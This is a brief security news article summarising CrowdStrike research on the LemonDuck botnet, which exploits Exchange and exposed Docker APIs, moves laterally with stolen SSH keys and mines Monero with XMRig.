A new botnet made up of compromised Microsoft Exchange servers is mining cryptocurrency for its operators, reports suggest.
According to researchers from security firm CrowdStrike, an unknown malicious actor is using the LemonDuck cryptomining botnet to target servers via ProxyLogon.
Searching for exposed Docker APIs for initial access, attackers can then run a malicious container using a custom Docker ENTRYPOINT to download a “core.png” image file, which disguises a Bash script.
After gaining initial access, attackers can perform a number of actions: abusing EternalBlue, BlueKeep, or similar exploits to elevate privileges, installing cryptominers, and moving laterally through compromised networks.
They can also install files that allow them to evade detection from any antivirus or malware scanning software installed on compromised endpoints.
Of all the different cryptominers, attackers primarily use XMRig to mine Monero, a privacy-focused cryptocurrency that would be harder to trace.
The researchers further explained that LemonDuck comes with a file called “a.asp”, which has the ability to disable the aliyun cloud service of Alibaba, and thus evade detection.
On why the campaign went undetected earlier, the researchers noted that threat actors were not scanning public IP address ranges en masse for exploitable attack surfaces, but instead moved sideways through LemonDuck, looking for SSH keys on the filesystem. Once they find the SSH keys, they use them to connect to servers and run all the aforementioned malicious scripts.
Cryptominers have become extremely popular in recent years, with the rising price of cryptocurrencies and the ease with which they can be sold in the market attracting the attention of both honest and dishonest players.